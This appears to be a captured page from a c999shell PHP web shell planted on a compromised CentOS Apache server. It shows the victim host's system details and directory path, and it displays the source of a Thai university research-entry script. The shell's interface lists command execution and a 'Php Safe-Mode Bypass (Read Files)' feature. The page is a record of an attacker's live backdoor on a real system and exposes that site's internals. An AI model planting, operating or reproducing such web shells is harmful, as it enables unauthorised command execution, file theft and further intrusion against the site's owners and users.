Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/teacher_aj_viratt/ drwxr-xr-x |
Viewing file: InsertResearch.php (3.93 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | <?php include("../include/FunctionDB.php"); ConnectDB(); $Flag = true; $Research_name = htmlspecialchars(trim($_POST['Research_name'])); $Research_char_else = htmlspecialchars(trim($_POST['Research_char_else'])); $name1 = htmlspecialchars(trim($_POST['name1'])); $name2 = htmlspecialchars(trim($_POST['name2'])); $name3 = htmlspecialchars(trim($_POST['name3'])); $name4 = htmlspecialchars(trim($_POST['name4'])); $name5 = htmlspecialchars(trim($_POST['name5'])); $name6 = htmlspecialchars(trim($_POST['name6'])); $name7 = htmlspecialchars(trim($_POST['name7'])); $name8 = htmlspecialchars(trim($_POST['name8'])); $abbStract = htmlspecialchars(trim($_POST['abbStract'])); $Fund_resource = htmlspecialchars(trim($_POST['Fund_resource'])); $Year_start = $_POST[mYear]."-".$_POST[mMonth]."-".$_POST[mDate]; $Year_finish = $_POST[mYear2]."-".$_POST[mMonth2]."-".$_POST[mDate2]; $Year_sprop = $_POST[mYear1]."-".$_POST[mMonth1]."-".$_POST[mDate1]; $Year_prop = $mYear1 ; ///////////////////// check name if ($Research_name =="") { $msg .="<li>กรุณาระบุ ชื่องานวิจัย"; $button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">"; $Flag = false; } /////////////////// Check Benifit //if ($Year_prop =="") //{ //$msg .="<li>กรุณาระบุ ปีที่เผยแพร่"; //$button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">"; //$Flag = false; //} /////////////////////// Check Address if( $Flag) { InsertResearch($Teacher_code,$Branch,$Research_name,$Research_type,$Research_char,$R_position,$name1,$name2,$name3,$name4,$name5,$name6,$name7,$name8,$abbStract,$Year_start,$Year_finish,$Year_sprop,$Fund,$Fund_resource,$Resource_des,$Propagate,$Propagate_des,$Prop_type,$Prop_type1,$Prop_type2,$Prop_type3,$Apply1,$Apply2,$Apply3,$Apply4,$Apply_des,$Year_prop); $msg.="<li>ผลงาน<b>$Research_name</b>"; $msg.="<li>ระบบจัดเก็บข้อมูลของท่านเรียบร้อยแล้ว"; echo"<meta http-equiv=\"refresh\" content=\"2;URL=ResearchList.php?Teacher_code=$Teacher_code&Year_prop=$Year_prop\">\n"; // $button = "<input type=\"reset\" value=\"Close Windows\" onclick=\"javascript:parent.close();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">"; } CloseDB(); ?> <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=windows-874"> <link rel="stylesheet" href="../css/cart4.css" type="text/css"> <link href="../css/style1.css" rel="stylesheet" type="text/css"> <style type="text/css"> <!-- .style2 {font-size: 14px} --> </style> </head> <body bgcolor="#FFFFFF"> <form> <br> <table width="49%" border="0"align="center"cellpadding="0" cellspacing="0"> <tr> <td><div align="center" class="style2"><font color="#003366" face="Tahoma">::ฟอร์มการเพิ่มข้อมูลผลงานวิจัยส่วนบุคคล::</font></div></td> </tr> <tr> <td> <table width="90%" border="0" cellspacing="0"cellpadding="0"align="center" class="table"> <tr> <td bgcolor="#FFFFFF"><div align="center" class="style2"><font color="#003366" face="Tahoma">ระบบแจ้ง</font></div></td> </tr> <tr> <td bgcolor="#000000"> <table width="90%" border="0" cellspacing="0"cellpadding="2"align="center"> <tr> <td><font color="#FFFFFF" size="3" face="Tahoma"><span><b><?php echo $msg;?></b></span></font></td> </tr> </table></td> </tr> <tr> <td bgcolor="#FFFFFF"> <div align="center"><b><font color="#CCFF00"><?php echo $button;?></font></b></div></td> </tr> </table> </td> </tr> </table> <br> <br> </form> </body> </html> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]-- |